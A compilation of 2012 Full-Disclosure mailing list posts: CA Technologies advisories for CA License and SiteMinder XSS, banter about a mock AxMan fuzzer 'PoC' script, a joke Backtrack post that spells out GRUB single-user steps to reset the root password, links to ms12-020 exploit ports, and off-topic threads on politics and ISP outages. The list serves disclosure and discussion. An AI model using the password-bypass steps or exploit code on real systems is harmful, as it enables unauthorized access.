> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+%2FDisallow%3A+typo3
> 
>
> This shouldn't be a discussion about bad practice but the google
> feature itself.
>
> Indexing a file which is used to prevent indexing.. isn't that just
> paradox and hypocrite?
>
> Thanks,
>
>
> Conan the bavarian


I'm wondering if, in perhaps .htaccess, one could allow ONLY site 
crawlers access to the robots.txt file.  Then add robots.txt to 
robots.txt...would this mitigate some of the risk?

James

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

[James Condron]

I would be interested to see a real world application of OP's
informative point though I do think vendor response is needed too.

Has anybody come across this in the wild?

On Thu, Nov 15, 2012 at 2:01 PM, Sanguinarious Rose
 wrote:
> I found this to be of high informational value, I do agree completely
> with the statement thus given.
>
> Please, tell us more about how to came to these conclusions, how this
> impacts this community, and the social dynamics of our society as a
> whole.
>
> Best Regards
>
> On Thu, Nov 15, 2012 at 7:02 AM, mohit tyagi  
> wrote:
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20121001-01: Security Notice for CA License

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20121001-01: Security Notice for CA License

Issued: October 01, 2012


CA Technologies Support is alerting customers to two potential risks in CA 
License (also known as CA Licensing).  Vulnerabilities exist that can 
allow a local attacker to execute arbitrary commands or gain elevated 
access.  CA Technologies has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2012-0691, occurs due to insecure use of 
system commands.  An unprivileged user can exploit this vulnerability to 
execute commands with system or administrator privileges.

The second vulnerability, CVE-2012-0692, occurs due to inadequate user 
validation.  An unprivileged user can exploit this vulnerability to create 
or modify arbitrary files and gain elevated access.


Risk Rating

High


Affected Platforms

AIX 5.x
DEC
HP-UX
Linux
Mac OS X
Solaris
Windows


Affected Products

CA Aion Business Rules Expert r11.0
CA ARCserve Backup r12.5, r15, r16
CA ARCserve Central Protection Manager r16
CA ARCserve Central Reporting r16
CA ARCserve D2D r15, r16, r16 On Demand
CA ARCserve Central Host Based VM Backup  (formerly CA ARCserve Host Based 
   VM Backup) r16
CA ARCserve Central Virtual Standby (formerly CA ARCserve Virtual 
   Conversion Manager) r16
CA Automation Point r11.2, r11.3
CA Client Automation (formerly CA Desktop and Server Management) r12.0, 
   r12.0 SP1, r12.5
CA Common Services (CCS) r11.2 SP2
CA ControlMinder (formerly CA Access Control) 12.5, 12.6
CA ControlMinder for Virtual Environments (formerly CA Access Control for 
   Virtual Environments) 2.0
CA Database Management r11.3, r11.4, r11.5
CA Directory 8.1
CA Easytrieve for Windows and UNIX 11.0, 11.1
CA Easytrieve for Linux PC 11.6
CA Erwin Data Modeler r7.x
CA Fast Unload for Distributed Databases 11.3, 11.4, 11.5
CA Gen r8
CA IdentityMinder (formerly CA Identity Manager) r12 CR16 and earlier
CA Insight Database Performance Manager 11.3, 11.4, 11.5
CA IT Asset Manager (ITAM) r12.6 and earlier
CA IT Client Manager r12.0, r12.0 SP1, r12.5
CA IT Inventory Manager r12.0, r12.0 SP1, r12.5
CA NSM r11.0, r11.1, r11.2, r11.2 SP1, r11.2 SP2
CA Output Management Web Viewer 11.5
CA Plex r6, r6.1
CA Repository for Distributed Systems r2.3
CA Service Accounting r12.5, r12.6
CA Service Catalog r12.5, r12.6
CA Service Desk Manager r12.1, r12.5, r12.6
CA Single Sign-On (SSO) r8.1, r12.0, r12.1 CR4 and earlier
CA Software Change Manager 12.0 FP2, 12.1, 12.1 SP1, 12.1 SP2, 12.1 SP3
CA Software Compliance Manager r12.0, r12.6
CA Storage Resource Manager (SRM) 11.8, 12.6
CA TSreorg for Distributed Databases 11.3, 11.4, 11.5
CA Unicenter Asset Portfolio Management r11.3, r11.3.4, r12.6
CA Workload Automation AE 4.5.0, 4.5.1, r11, r11.3
CA Workload Automation DE r11.3
CA XCOM Data Transport Gateway PC Linux r11.5
CA XCOM Data Transport Gateway Windows r11.5
CA XCOM Data Transport for PC Linux r11.5
CA XCOM Data Transport for Windows r11.5
CA XCOM Data Transport Management Center for PC Linux r11.5
CA XCOM Data Transport Management Center for Windows r11.5


Affected Components

CA License 1.90.02 and earlier


Non-Affected Products

CA ControlMinder (formerly CA Access Control) 12.6 SP1
CA Client Automation 12.5 SP1
CA Directory r12.0 SP1 or later
CA Gen r8.5
CA IdentityMinder (formerly CA Identity Manager) r12.5
CA IT Client Manager r12.5.SP1
CA IT Inventory Manager r12.5.SP1
CA Plex r7.0
CA Service Accounting r12.7
CA Service Catalog r12.7
CA Service Desk Manager r12.7
CA Single Sign-On (SSO) r12.1 CR5
CA Storage Resource Manager (SRM) 12.6 SP1
CA Workload Automation DE r11.1 (does not use CA License)


Non-Affected Components

CA License 1.90.03 or later


How to determine if the installation is affected

All versions of CA License before 1.90.03 are vulnerable.

The installed version of CA License can be obtained by using the 
“lic98version” program.  Lic98version retrieves the version of CA
License 
installed on a machine along with the version of specific individual files.
The version information is written to the lic98version.log file located in 
the CA License installation location, and is also displayed on the console.


Solution

CA has issued patches to address the vulnerability.


For all CA product installations on Linux, please note these Linux-specific
instructions:

1.  First, make backups of the ca.olf file and the lic98.dat file.
2.  Uninstall the existing/old version of CA License.
3.  Perform the installation of CA License 1.90.04.
4.  Confirm the successful installation of 1.9.04, and then replace the 
existing ca.olf file and lic98.dat file with the files you backed 
up in step 1.

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/ 


CA Aion Business Rules Expert r11.0:
Download and install CA License v1.90.04 or later for Windows and Linux 
platforms, or v1.90.03 or later for all other platforms:
https:

Re: [Full-disclosure] Full-Disclosure Digest, Vol 91, Issue 23

[James]

Unsubscribe

Sent from my iPad

On 18/09/2012, at 10:47 PM, full-disclosure-requ...@lists.grok.org.uk wrote:

> Send Full-Disclosure mailing list submissions to
>full-disclosure@lists.grok.org.uk
> 
> To subscribe or unsubscribe via the World Wide Web, visit
>https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>full-disclosure-requ...@lists.grok.org.uk
> 
> You can reach the person managing the list at
>full-disclosure-ow...@lists.grok.org.uk
> 
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
> 
> 
> Note to digest recipients - when replying to digest posts, please trim your 
> post appropriately. Thank you.
> 
> 
> Today's Topics:
> 
>   1. Re: Adobe Flash UpdateInstalls Other Warezwithout Consent
>  (Jeffrey Walton)
> 
> 
> --
> 
> Message: 1
> Date: Mon, 17 Sep 2012 13:59:12 -0400
> From: Jeffrey Walton 
> Subject: Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>without Consent
> To: Christian Sciberras 
> Cc: Disclosure ,BugTraq
>
> Message-ID:
>
> Content-Type: text/plain; charset="utf-8"
> 
> Hi Christian,
> 
>> So, I was updating flash on a computer lately, when I noticed the
>> prompt below*, reminding me of this conversation.
> Its a different URL. The URL I used was provided by the Adobe Flash Update
> Service.
> 
> Considering how bad they've done in userland, its a scary thought they are
> installing software at an elevated privilege level (and IT allows it).
> 
>> or maybe it just took me a few weeks to photoshop this
> If you can't program them or secure them, you might as well paint on them.
> 
> Jeff
> 
> On Mon, Sep 17, 2012 at 1:39 PM, Christian Sciberras wrote:
> 
>> So, I was updating flash on a computer lately, when I noticed the prompt
>> below*, reminding me of this conversation.
>> 
>> *or maybe it just took me a few weeks to photoshop thisyou decide.
>> 
>> To the more reasonable readers, I guess Adobe could have had a genuine
>> mistake / bug in their codenothing new.
>> Don't know why it's such a big deal.
>> 
>> 
>> 
>> [image: Inline image 1]
>> On Sun, Sep 9, 2012 at 11:21 PM, Marcio B. Jr. 
>> wrote:
>> 
>>> You may be interested in getting acquainted with the fact that life is
>>> possible (it's actually stupendously better) without crapware.
>>> 
>>> On Thu, Sep 6, 2012 at 2:09 PM, Jeffrey Walton 
>>> wrote:
 The company that writes the worlds most insecure software [1,2,3] has
 figured out a way to further increase an attack surface.
 
 Adobe now includes additional warez in their updates without consent.
 The warez includes a browser and tools bar. The attached image is what
 I got when I agreed to update Adobe Flash because of recent security
 vulnerability fixes.
 
 It appears Adobe has become a whore to Google like Mozilla.
 
 +1 Adobe.
 
 [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
 [2]
>>> http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
 [3]
>>> http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
 [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
 
 [SNIP]
>>> 
>> 
> -- next part --
> An HTML attachment was scrubbed...
> URL: 
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20120917/6db9e97e/attachment.html
>  
> -- next part --
> A non-text attachment was scrubbed...
> Name: not available
> Type: image/png
> Size: 211549 bytes
> Desc: not available
> Url : 
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20120917/6db9e97e/attachment.png
>  
> 
> --
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> End of Full-Disclosure Digest, Vol 91, Issue 23
> ***
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder [updated]

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20111208-01: Security Notice for CA SiteMinder


Issued: December 08, 2011
Updated: August 22, 2012


CA Technologies Support is alerting customers to a potential risk in 
CA SiteMinder, CA Federation Manager, CA SOA Security Manager, CA 
SiteMinder Secure Proxy Server, and CA SiteMinder SharePoint Agent. A 
vulnerability exists that can allow a malicious user to execute a 
reflected cross site scripting (XSS) attack. CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-4054, occurs due to insufficient 
validation of postpreservationdata parameter input utilized in the 
login.fcc form. A malicious user can submit a specially crafted 
request to effectively hijack a victim's browser.


Risk Rating

Medium


Platform

All


Affected Products

CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier
CA Federation Manager 12.1 SP3 and earlier
CA SOA Security Manager 12.1 SP3 and earlier
CA SiteMinder Secure Proxy Server 12.0 SP3 and earlier
CA SiteMinder Secure Proxy Server 6.0 SP3 and earlier
CA SiteMinder SharePoint Agent 12.0 SP3 and earlier


Non-Affected Products

CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9
CA Federation Manager 12.1 SP3 CR00.1
CA SOA Security Manager 12.1 SP3 CR01.1
CA SiteMinder Secure Proxy Server 12.0 SP3 CR01.1
CA SiteMinder Secure Proxy Server 6.0 SP3 CR07.1
CA SiteMinder SharePoint Agent 12.0 SP3 CR0.1


How to determine if the installation is affected

Check the Web Agent log or Installation log to obtain the installed 
release version. Note that the "webagent.log" file name is 
configurable by the SiteMinder administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later

CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later

CA Federation Manager 12.1 SP3:
Apply fix RS47435

CA SOA Security Manager 12.1 SP3:
Apply fix RS47436

CA SiteMinder Secure Proxy Server 12.0 SP3:
Apply fix RS47431

CA SiteMinder Secure Proxy Server 6.0 SP3:
Apply fix RS47432

CA SiteMinder SharePoint Agent 12.0 SP3:
Apply fix RS47433

CR releases can be found on the CA SiteMinder Hotfix/Cumulative 
Release page (URL may wrap):
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E
29-C3DE-405E-9151-9EEA72D965CE}.


Workaround

None


References

CVE-2011-4054 - CA SiteMinder login.fcc XSS

Acknowledgement

CVE-2011-4054 - Jon Passki of Aspect Security, via CERT

Change History

Version 1.0: Initial Release
Version 1.1: Updated R6 fix information
Version 1.2: Added information for Federation Manager, SOA Security 
Manager, SiteMinder Secure Proxy Server, SiteMinder SharePoint Agent


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFQO7sGeSWR3+KUGYURAvlVAJwNzRfo5NORDDMQhau8SfLHOGnMqACfYEfY
xM1DGynkf5e0fdgSVhvVYGM=
=JTJo
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-12-145 : Symantec Endpoint Protection SemSvc.exe AgentServlet Remote Code Execution Vulnerability

[James Lay]

On 2012-08-22 09:40, ZDI Disclosures wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ZDI-12-145 : Symantec Endpoint Protection SemSvc.exe AgentServlet 
> Remote
> Code Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-12-145
> August 22, 2012

> - -- Vendor Response:
> Symantec has issued an update to correct this vulnerability. More 
> details
> can be found at:
> 
> http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se
> curity_advisory&pvid=security_advisory&year=2012&suid=20120522_01
>
> - -- Disclosure Timeline:
> 2011-10-28 - Vulnerability reported to vendor
> 2012-08-22 - Coordinated public release of advisory
>


According to the link, they published a fix in May of this year?  Did I 
miss something?  Thanks.

James

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

[James Condron]

In which case I would like his follow up email read both on my wedding night 
and funeral (hopefully different nights)

Sent using BlackBerry® from Orange

-Original Message-
From: Thor 
Date: Tue, 31 Jul 2012 10:09:06 
To: 
Cc: kaveh ghaemmaghami; 
; 
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption  
PoC

Nope.  He's serious.  We had an offline discussion (if you want to call it 
that) where he maintains it is a problem and that other people "appreciate" it.

t


On Jul 31, 2012, at 9:25 AM, James Condron wrote:

> Its a piss take. Of course its a piss take.
> 
> Sent using BlackBerry® from Orange
> 
> -Original Message-
> From: kaveh ghaemmaghami 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Sun, 29 Jul 2012 15:08:44 
> To: 
> Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption
>   PoC
> 
> I think ur on vacation now aren't u  Plus nobody ask u to read my
> post and i am not interested about ur opinion keep it for yourself
> 
> On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
>  wrote:
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolka...@rocketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> 
>>Crash The Exploiter
>> Lame HD Moore fuzzer Memory Corruption
>>  By Awsome coolkaveh
>> 
>> ---
>> 
>> import os
>> import win32api
>> crash = "  Crash The Exploiter  "
>> lame="Lame HD Moore fuzzer Memory corruption  "
>> awsome="   By Awsome coolkaveh  "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

[James Condron]

Its a piss take. Of course its a piss take.

Sent using BlackBerry® from Orange

-Original Message-
From: kaveh ghaemmaghami 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 29 Jul 2012 15:08:44 
To: 
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption
PoC

I think ur on vacation now aren't u  Plus nobody ask u to read my
post and i am not interested about ur opinion keep it for yourself

On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
 wrote:
> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
> Crash : http://imageshack.us/f/217/axman.jpg/
> Date: July 28, 2012
> Author: coolkaveh
> coolka...@rocketmail.com
> Https://twitter.com/coolkaveh
> Vendor Homepage: http://digitaloffense.net/tools/axman/
> version : 1.0.0
> Tested on: windows 7 SP1
> 
> Crash The Exploiter
>  Lame HD Moore fuzzer Memory Corruption
>   By Awsome coolkaveh
>
> ---
>
> import os
> import win32api
> crash = "  Crash The Exploiter  "
> lame="Lame HD Moore fuzzer Memory corruption  "
> awsome="   By Awsome coolkaveh  "
> print
> print
> print
> print crash
> print
> print lame
> print
> print awsome
> print
> print
> print
> print
> exploit = ("\x90" *800)
> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

[James Condron]

Aand now we degenerate into a political argument nobody but the poster 
gives a fuck about.

Ta for that, maybe take it elsewhere. Let's keep on topic (though we may be 
several posts behind)

Sent using BlackBerry® from Orange

-Original Message-
From: Bzzz 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 8 Jun 2012 20:03:51 
To: 
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
 Against Iran

On Fri, 08 Jun 2012 13:36:07 -0400
Laurelai  wrote:

> Excuse me but im a veteran who served 10 years in the Army and I
> damn well earned my right to complain about how broken the system
> is, myself and the soldiers around me sacrificed so that we could
> all have a free country and that yes I could "whine" about it. Its
> called the US Constitution, we took an oath to uphold and defend
> it and everything it stands for. 

And in 10 years you didn't understood how the system is working,
that you were following orders from people that won't ever take
any risk (nor their family & friends), that are themselves receiving
their orders from big money/business/poliotics you'll never see on
tv nor in any newspaper.

> So while I'm saying here that the civil liberties I swore to
> uphold and defend are eroding away and that evil is triumphing
> over the US, you are telling me this is business as usual.

You are not lucid, your country has _always_ been a rat lab where
masters tell you that you're free, but dig a (tiny) bit and you'll
see that's always been a big fat lie (ie: you pay income taxes?
but the 19th amendment has never been ratified - and your own
justice is enforcing sanctions if you don't pay, knowing what they
do is totally illegal...)

> Just because something evil is the established way of things or is
> becoming the established way of things doesn't mean we have to or
> should accept it. Perhaps *you* should stop being so cold and
> jaded about the evils of the world and put some you know *effort*
> into fixing them instead of trying to shout down anyone who tries
> or talks about trying to make the world better.

I think he's living in a real world and look at it coldly & without
any indulgence.

> You are honestly implying that there is absolutely nothing that
> can ever be done ever and we should all just lie down and take it,
> can you understand why I might take issue with that perspective?
> You are saying in essence "There is no more room to improve so we
> should never again try."

Thor missed one thing though: he said "people are doing things for 2
reasons; get laid or get paid", there are 2 more reasons: for fun
and for ideals; the latest being the most dangerous thing in the
whole world.

Jean-Yves
-- 
Obviously the only rational solution to your problem is suicide.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Backtrack

[James Condron]

I like it; its kinda like the old one about anonymous hacking FTP
servers and the only way to tell is whether or not you have a user
'anonymous'


On Tue, Apr 24, 2012 at 7:10 PM, Disposable
 wrote:
> Crazy! it works in pretty much every linux by default.
>
> This guy knows stuff. We all got to enroll on that "High School of Security"
> he is talking about!!!
>
>
> On Tue, Apr 24, 2012 at 4:51 PM, David3 Gonnella  wrote:
>>
>> it makes me scary! There is also on my distro! DOH! ;P
>>
>>
>> On 04/24/12 16:41, Urlan wrote:
>> > It makes me laugh! hahahaha
>> >
>> > 2012/4/24 Gage Bystrom 
>> >
>> >> *sigh* vulnerability reports like this make me sad.
>> >> On Apr 24, 2012 5:50 AM, "Григорий Братислава" 
>> >> wrote:
>> >>
>> >>> Is good evening. I is would like to warn you about is vulnerability in
>> >>> Backtrack is all version.
>> >>>
>> >>> Backtrack Linux is penetration tester is system. Is come complete with
>> >>> tool for to make hacking for penetration tester.
>> >>>
>> >>> In is booting Backtrack, vulnerability exist in booting for when start
>> >>> if attacker is edit grub, attacker can bypass restricted user and is
>> >>> boot into admin account. E.g.:
>> >>>
>> >>> grub edit > kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
>> >>> [ENTER]
>> >>> grub edit > b
>> >>> # mount -t proc proc /proc
>> >>> # mount -o remount,rw /
>> >>> # passwd
>> >>> [ENTER IS ANYTHING YOU WANT]
>> >>> # sync
>> >>> # reboot
>> >>>
>> >>> I is will make this into video for bypassing security in Backtrack for
>> >>> to post on InfoSecInstitute
>> >>>
>> >>> --
>> >>>
>> >>> `Wherever I is go - there am I routed`
>> >>>
>> >>
>> >
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

[James Condron]

Paper list of jurors traditionally.

But yes, spam as far as I can tell.

On Wed, Apr 25, 2012 at 2:46 AM, Alex Buie  wrote:
> What the hell is an "empanelment"?
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ms12-020 PoC

[James Condron]

Nobody said a word.

Relax more and you might live long enough to write your next book.

Sent using BlackBerry® from Orange

-Original Message-
From: "Thor (Hammer of God)" 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 18 Mar 2012 17:03:25 
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC

P.S. Before someone starts accusing me of "spamming" for the book, (one asshat 
tried to compare me to Juan whats-his-face once) note you can actually view 
most of the RDP chapter (and others) on the Amazon "preview a page" feature if 
you would like.

If you are interested in RDP security, I suggest you take a free read on 
Amazon.   Many are worried about worm activity from 020, and I am far more 
interested in pointing you to free material that helps you secure yourself and 
others than I am trying to make a buck on the book.  

If anyone has any questions about how any of this works, I'm happy to help if I 
can.

t

>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
>boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
>Sent: Sunday, March 18, 2012 9:21 AM
>To: Nahuel Grisolía; root
>Cc: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] ms12-020 PoC
>
>You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel.
>Once you are authenticated and authorized, the TSGateway server will
>establish a connection via RDP to the target server, tunneling the RDP
>connection back to you within the RPC/HTTP(S) channel.
>
>As such, TSGateway is obviously unaffected by this vulnerability.  For those of
>you looking for mitigation and not kiddie code to pop a box, note that simply
>using NLA mitigates both RDP issues.
>
>This might be a good time to point out than anyone who followed any of my
>advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using
>the little ThoRDP tool I wrote (also in the book) was protected from these
>vulnerabilities way before they were discovered.   I say that to simply 
>identify
>that some simple, effective techniques can be deployed that thwarts the
>hours and hours people put into developing exploit code and the wasted time
>chasing all this stuff down.  *THAT* is what security is about, btw.
>
>t
>
>>-Original Message-
>>From: full-disclosure-boun...@lists.grok.org.uk
>>[mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Nahuel
>>Grisolía
>>Sent: Friday, March 16, 2012 11:41 AM
>>To: root
>>Cc: full-disclosure@lists.grok.org.uk
>>Subject: Re: [Full-disclosure] ms12-020 PoC
>>
>>Guys,
>>
>>What about TS Gateway? which is actually listening on port 443 (by def)...
>>
>>thanks!
>>
>>Nahu.
>>
>>On 16 March 2012 15:12, root  wrote:
>>> The SABU code is fake (go figure).
>>> This python script is the first port of the Luigi code to python,
>>> that's why sucks.
>>>
>>> Here are better ports: http://pastebin.com/4FnaYYMz and
>>> http://pastebin.com/jzQxvnpj
>>>
>>> On 03/16/2012 02:50 PM, Exibar wrote:
 Is that the same code from yesterday?  I thought that code was a
 fake and
>>didn'kt do anything?

   Anyone confirm this?

  Exibar
 Sent via BlackBerry by AT&T

 -Original Message-
 From: kyle kemmerer 
 Sender: full-disclosure-boun...@lists.grok.org.uk
 Date: Fri, 16 Mar 2012 12:01:16
 To: 
 Subject: [Full-disclosure] ms12-020 PoC

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>___
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is my ISP lying or stupid?

[James Condron]

 Sorry, I don't mean to be rude but none of that made any sense, especially 
from an ISP perspective.

You will never have a switch per area; it doesn't work like that, you'll have a 
series of distribution routers for routing to customers. Mail, www, shell, SIP, 
whatever will be other services which of course are on one to a milloin 
switches.  Really doesn't matter as this has nothing to do with anything.

The routers of an ISP are sorta DHCP in the sense that the IPs are dynamic- 
DHCP really works as one network whereas an ISP switch will have a series of 
/30 vlans for obvious reasons. Getting an IP and connection is more complex 
than that but already we're down to a series of routers.

Somewhere in a datacenter (Lets keep it simple for now) is a cabinet with a 
bunch of servers in; one will do customer web space and so on. This cabinet 
will have a switch in and either this went or the router it is connected to.

They're not using teaming. They're not using loadbalancers. 17^39 is a bit of a 
weird one to even have to type out.

Somewhere someone pulled the wrong cable or someone broke a route. These are 
the two things which cause (In my experience) almost all of ISP issues. That or 
a switch died.

And whether they meant switch or not they said switch. Chances are they lost a 
blade or an SFP or whatever.

On 18 Mar 2012, at 15:47, valdis.kletni...@vt.edu wrote:

> On Sun, 18 Mar 2012 12:49:49 -, Peter Maxwell said:
>> On 16 March 2012 19:11, Dave  wrote:
>>> Your ISP probably has their users are on different networks than their
>>> servers.  Sounds like maybe they meant the switch you are on, not the
>>> servers switch.  Need to troubleshoot, use a smart phone or some other OOB
>>> capable device to test access to the ISP servers.  If you can access OOB,
>>> then maybe they aren't lying.  Just a guess, you didnt provide much detail.
> 
>> Unlikely, usually these switches are quite large and when a user has OOB it
>> usually means console access to the server, i.e. nothing to do with network
>> topology.
> 
> I strongly suspect that what Dave meant was:
> 
> 1) There's a switch at the ISP's central site that the services live on.
> 2) There's *another* switch that you and the other subscribers in your
> area are connected to.
> 3) If you can reach the mail server via other means (IP-capable cellphone,
> wireless from the local McDonalds, etc), it's more likely switch (2) than (1).
> 
> The real troubleshooting fun starts when you throw things like load balancers
> and ethernet bonding into the the config.  Nice things if they work, but can 
> be
> a bear to diagnose.  If they're doing round-robin, they can end up hosing 
> every
> N'th connection (which is loads of fun when N is in the hundreds).  The other
> common failure mode is hashing each inbound's address to determine which back
